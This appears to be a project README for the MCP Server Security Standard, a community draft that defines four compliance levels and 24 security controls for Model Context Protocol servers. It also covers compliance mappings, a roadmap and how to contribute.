The Model Context Protocol enables AI models to interact with external systems through tools, resources, and prompts. As adoption accelerates, critical vulnerabilities have emerged: command injection, path traversal, SSRF attacks, and supply chain compromises.
MSSS provides:
- 24 security controls across 8 domains
- 4 compliance levels (L1-Essential, L2-Development, L3-Production, L4-Maximum Assurance)
- Risk-based level selection framework inspired by NIST CSF, OWASP ASVS, and CIS Controls
- 6 deployment profiles (Local Dev, Team Server, Internet-Facing, etc.)
- Evidence-based verification with clear acceptance criteria
- Machine-readable reporting through JSON schemas
The following platforms have adopted the MCP Server Security Standard:
| - | Platform | Description | Status |
|---|---|---|---|
 |
MCP-Hub | MCP server directory and marketplace — discover, publish, and manage MCP-compliant servers | ✅ Compliant |
Are you implementing MSSS? Open an issue or submit a PR to be listed here.
Released: January 15, 2026 (Community Review Draft)
- Core standard framework (msss.md)
- 6 deployment profiles defined
- Comprehensive threat model
- 23 fully documented security controls
- JSON reporting schemas
- i18n framework for translations
- Implementation examples for common frameworks
- Automated verification tools
- Reference assessment reports
- Translations to other languages
- Real-world testing and feedback
- Review deployment profiles to find your scenario
- Implement controls from control catalog
- Use reporting schemas for assessment
- Share your experience via issues or discussions
# Fork and clone
git clone https://github.com/YOUR-USERNAME/mcp-server-security-standard
cd mcp-server-security-standard
# Start a translation
mkdir -p v0.1/i18n/es/standard- Report vulnerabilities: security@mcp-security-standard.org
- Share attack patterns: Open an issue with
threat-researchlabel - Propose new controls: See contributing guide
MSSS defines four compliance levels using a risk-based selection model (not maturity progression). Organizations select their target level based on deployment context, data sensitivity, and potential impact.
| Level | Target Audience | Controls | Validation | Timeline |
|---|---|---|---|---|
| L1: Essential | Personal/Hobby | 6 (25%) | Self-assessment | 1-2 hours |
| L2: Development | Internal/Team | 12 (50%) | Self + scanning | 4-8 hours |
| L3: Production | Enterprise/Customers | 18 (75%) | Internal audit | 1-2 weeks |
| L4: Maximum Assurance | Critical/Regulated | 24 (100%) | Third-party pentest | 4-8 weeks |
Choose your level based on 4 key questions:
- Who uses it? Individual → L1 | Team → L2 | Organization/Customers → L3 | Public/Regulated → L4
- What data? Public → L1 | Internal → L2 | Business/PII → L3 | Regulated (PHI/PCI) → L4
- Impact if compromised? Inconvenience → L1 | Dev delays → L2 | Disruption → L3 | Severe harm → L4
- Threat model? Opportunistic → L1 | Semi-targeted → L2 | Targeted → L3 | APT → L4
Level 1 (Essential)
- Essential protection for personal tools and hobby projects
- Prevents: Command injection, path traversal, SSRF, credential leaks
- Key controls: No shell execution, path allowlisting, URL validation, schema validation, secret redaction
Level 2 (Development)
- Security for development teams and internal tools
- Adds: TLS enforcement, input bounds, timeouts, command allowlisting, trusted sources
- Required for: Team projects, internal apps, pre-production environments
Level 3 (Production)
- Comprehensive security for enterprise and customer-facing applications
- Adds: OAuth authentication, RBAC, audit logging, container hardening
- Required for: SaaS products, customer data, business-confidential information
Level 4 (Maximum Assurance)
- Maximum hardening for critical infrastructure and regulated environments
- Adds: Filesystem sandboxing, egress filtering, seccomp/AppArmor, runtime monitoring
- Required for: HIPAA (healthcare), PCI DSS (payments), FedRAMP (government)
📖 Full documentation: See Compliance Levels and Control-Level Mapping
- HIPAA (Healthcare): Level 4 minimum for PHI access
- PCI DSS (Payments): Level 4 minimum for cardholder data
- SOC 2 (SaaS): Level 3 minimum
- ISO 27001: Level 3 minimum for certification
- FedRAMP: Low→L3, Moderate/High→L4
| Control | Level | Description |
|---|---|---|
| MCP-FS-01 | L1 | Path allowlisting to prevent unauthorized file access |
| MCP-FS-02 | L1 | Symlink resolution to prevent path traversal via symbolic links |
| MCP-FS-03 | L4 | Filesystem sandboxing for complete isolation |
| Control | Level | Description |
|---|---|---|
| MCP-EXEC-01 | L1 | Avoid shell execution to prevent command injection |
| MCP-EXEC-02 | L2 | Command allowlisting for permitted executables |
| MCP-EXEC-03 | L2 | Argument separation to prevent injection attacks |
| Control | Level | Description |
|---|---|---|
| MCP-NET-01 | L1 | URL validation to prevent SSRF attacks |
| MCP-NET-02 | L4 | Egress traffic filtering with destination allowlists |
| MCP-NET-03 | L2 | TLS 1.2+ enforcement for all remote connections |
| Control | Level | Description |
|---|---|---|
| MCP-AUTHZ-01 | L3 | OAuth 2.1 delegation for secure authentication |
| MCP-AUTHZ-02 | L3 | Per-tool scope definition with granular permissions |
| MCP-AUTHZ-03 | L3 | Least privilege tool design principles |
| MCP-AUTHZ-04 | L3 | Resource-based access control (RBAC) |
| Control | Level | Description |
|---|---|---|
| MCP-INPUT-01 | L1 | JSON Schema validation for all tool arguments |
| MCP-INPUT-02 | L2 | Input bounds checking to prevent DoS attacks |
| MCP-INPUT-03 | L2 | Timeout enforcement for resource exhaustion prevention |
| Control | Level | Description |
|---|---|---|
| MCP-LOG-01 | L3 | Comprehensive audit logging for all tool invocations |
| MCP-LOG-02 | L1 | Automatic secret redaction in logs |
| Control | Level | Description |
|---|---|---|
| MCP-SUPPLY-01 | L4 | Package integrity verification with checksums |
| MCP-SUPPLY-02 | L2 | Trusted package sources and registry verification |
| Control | Level | Description |
|---|---|---|
| MCP-DEPLOY-01 | L3 | Container hardening with security best practices |
| MCP-DEPLOY-02 | L4 | System call filtering via seccomp/AppArmor |
| MCP-DEPLOY-03 | L4 | Resource limits and rate limiting for DoS prevention |
Total: 24 controls across 8 security domains
- Level 1: 6 controls (25%) - Essential baseline
- Level 2: 12 controls (50%) - Development protection
- Level 3: 18 controls (75%) - Production security
- Level 4: 24 controls (100%) - Maximum assurance
We follow a simple process:
- Pick an area - Check issues labeled
help-wantedorgood-first-issue - Discuss - Open an issue or join discussions before major work
- Submit - Create a PR with clear description
- Iterate - Address feedback from reviewers
HIGH PRIORITY
- Add real-world implementation examples
- Create reference implementations for common frameworks
- Test controls against production deployments
MEDIUM PRIORITY
- Add profile-specific guidance
- Start Spanish, Portuguese, or other translations
- Develop automated verification tools
ALWAYS WELCOME
- Fix typos and improve clarity
- Add references to new CVEs or research
- Share implementation experiences
- Discussions: GitHub Discussions - Ask questions, share ideas
- Issues: GitHub Issues - Report bugs, request features
Looking for Co-Maintainers! If you're passionate about MCP security and want to help shape this standard, please reach out.
All contributors will be recognized in:
- CHANGELOG.md for significant contributions
- Control documents you author or substantially improve
- Gather feedback on 23 controls
- Validate against real-world deployments
- Collect implementation experiences
- Incorporate community feedback
- Add controls for emerging threats
- Publish reference implementations
- Launch translation program
- Stable specification
- Automated verification tools
- Certification program framework
- Training materials
MSSS complements:
- OWASP MCP Top 10 - Risk categories
- OWASP ASVS - Verification standard
- CWE - Weakness enumeration
- NIST Cybersecurity Framework - Risk management
MSSS uses a multi-license approach:
| Component | License | Purpose |
|---|---|---|
| Standard Text | CC BY-SA 4.0 | Free sharing with attribution |
| JSON Schemas | Apache 2.0 | Commercial tool integration |
| Code Examples | MIT | Maximum flexibility |
See the full license text in the LICENSE file.
- Star this repository - Help others discover MSSS
- Share with your network - Spread awareness
- Contribute - Your expertise makes MSSS better
MSSS builds upon:
- Security researchers who disclosed MCP vulnerabilities
- OWASP MCP Top 10 community
- Early adopters providing feedback
- Academic researchers (MCPLIB, Hou et al.)
The MCP Server Security Standard is an open community project. We provide this standard as-is without warranties. Use at your own discretion.